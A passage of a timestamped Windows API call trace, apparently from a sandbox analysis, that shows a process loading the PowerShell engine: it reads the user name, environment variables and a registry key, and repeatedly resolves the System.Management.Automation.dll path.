	[0041.179] GetUserNameW (in: lpBuffer=0x190b58, pcbBuffer=0x25e680 | out: lpBuffer="2XC7u663GxWc", pcbBuffer=0x25e680) returned 1
	[0041.180] ReportEventW (hEventLog=0x4350004, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x23801ec*="Available", lpRawData=0x23800a8) returned 1
	[0041.181] GetLastError () returned 0x0
	[0041.182] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190b58, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0041.182] GetLastError () returned 0xcb
	[0041.183] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190b58, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0041.183] GetLastError () returned 0xcb
	[0041.189] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e158, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0041.189] GetLastError () returned 0xcb
	[0041.189] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e108, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0041.189] GetLastError () returned 0xcb
	[0041.189] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e108, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0041.189] GetLastError () returned 0xcb
	[0041.192] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e0fc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0041.192] GetLastError () returned 0xcb
	[0041.192] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e0ac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0041.192] GetLastError () returned 0xcb
	[0041.192] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e0ac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0041.192] GetLastError () returned 0xcb
	[0041.192] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x190b58, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0041.192] GetLastError () returned 0xcb
	[0041.193] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x190b58, nSize=0x80 | out: lpBuffer="\\Users\\2XC7u663GxWc") returned 0x13
	[0041.193] GetLastError () returned 0xcb
	[0041.193] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e0fc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0041.193] GetLastError () returned 0xcb
	[0041.193] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e0ac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0041.193] GetLastError () returned 0xcb
	[0041.193] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e0ac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0041.193] GetLastError () returned 0xcb
	[0041.193] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e0fc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0041.193] GetLastError () returned 0xcb
	[0041.193] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e0ac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0041.193] GetLastError () returned 0xcb
	[0041.193] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e0ac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0041.193] GetLastError () returned 0xcb
	[0041.194] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e0fc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0041.194] GetLastError () returned 0xcb
	[0041.194] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e0ac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0041.194] GetLastError () returned 0xcb
	[0041.194] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e0ac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0041.194] GetLastError () returned 0xcb
	[0041.194] GetCurrentProcessId () returned 0xdd0
	[0041.194] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e0fc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0041.194] GetLastError () returned 0xcb
	[0041.194] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e0ac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0041.194] GetLastError () returned 0xcb
	[0041.194] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e0ac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0041.194] GetLastError () returned 0xcb
	[0041.195] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0041.195] GetLastError () returned 0xcb
	[0041.195] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e098, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0041.195] GetLastError () returned 0xcb
	[0041.195] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e098, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0041.195] GetLastError () returned 0xcb
	[0041.195] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0041.195] GetLastError () returned 0xcb
	[0041.195] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e098, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0041.195] GetLastError () returned 0xcb
	[0041.195] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e098, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0041.195] GetLastError () returned 0xcb
	[0041.196] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e0fc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0041.196] GetLastError () returned 0xcb
	[0041.196] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e0ac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0041.196] GetLastError () returned 0xcb
	[0041.196] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e0ac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0041.196] GetLastError () returned 0xcb
	[0041.196] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e60c | out: phkResult=0x25e60c*=0x330) returned 0x0
	[0041.196] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25e654, lpData=0x0, lpcbData=0x25e650*=0x0 | out: lpType=0x25e654*=0x1, lpData=0x0, lpcbData=0x25e650*=0x56) returned 0x0
	[0041.196] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25e654, lpData=0x190b58, lpcbData=0x25e650*=0x56 | out: lpType=0x25e654*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x25e650*=0x56) returned 0x0
	[0041.197] RegCloseKey (hKey=0x330) returned 0x0
	[0041.197] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e0fc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0041.197] GetLastError () returned 0xcb
	[0041.197] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e0ac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0041.197] GetLastError () returned 0xcb
	[0041.197] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e0ac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0041.197] GetLastError () returned 0xcb
	[0041.198] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e0e4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0041.198] GetLastError () returned 0xcb
	[0041.198] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e094, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0041.198] GetLastError () returned 0xcb
	[0041.198] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e094, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0041.198] GetLastError () returned 0xcb
	[0041.209] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190b58, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0041.209] GetLastError () returned 0xcb
	[0041.209] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d774, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0041.209] GetLastError () returned 0xcb
	[0041.209] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d724, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0041.209] GetLastError () returned 0xcb
	[0041.209] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d724, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0041.209] GetLastError () returned 0xcb
	[0041.210] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d774, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0041.210] GetLastError () returned 0xcb
	[0041.210] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d724, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0041.210] GetLastError () returned 0xcb
	[0041.210] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d724, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0041.210] GetLastError () returned 0xcb
	[0041.210] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d774, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0041.210] GetLastError () returned 0xcb
	[0041.210] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d724, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0041.210] GetLastError () returned 0xcb
	[0041.210] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d724, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0041.210] GetLastError () returned 0xcb
	[0041.210] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d774, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0041.210] GetLastError () returned 0xcb
	[0041.210] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d724, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0041.210] GetLastError () returned 0xcb
	[0041.210] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d724, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0041.210] GetLastError () returned 0xcb
	[0041.210] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d774, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0041.211] GetLastError () returned 0xcb
	[0041.211] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d724, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0041.211] GetLastError () returned 0xcb
	[0041.211] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d724, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0041.211] GetLastError () returned 0xcb
	[0041.211] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d774, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0041.211] GetLastError () returned 0xcb
	[0041.211] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d724, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0041.211] GetLastError () returned 0xcb
	[0041.211] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d724, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0041.211] GetLastError () returned 0xcb
	[0041.211] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d774, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0041.211] GetLastError () returned 0xcb
	[0041.211] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d724, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0041.211] GetLastError () returned 0xcb
	[0041.211] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d724, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0041.211] GetLastError () returned 0xcb
	[0041.211] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0041.211] GetLastError () returned 0xcb
	[0041.211] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0041.211] GetLastError () returned 0xcb
	[0041.211] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0041.211] GetLastError () returned 0xcb
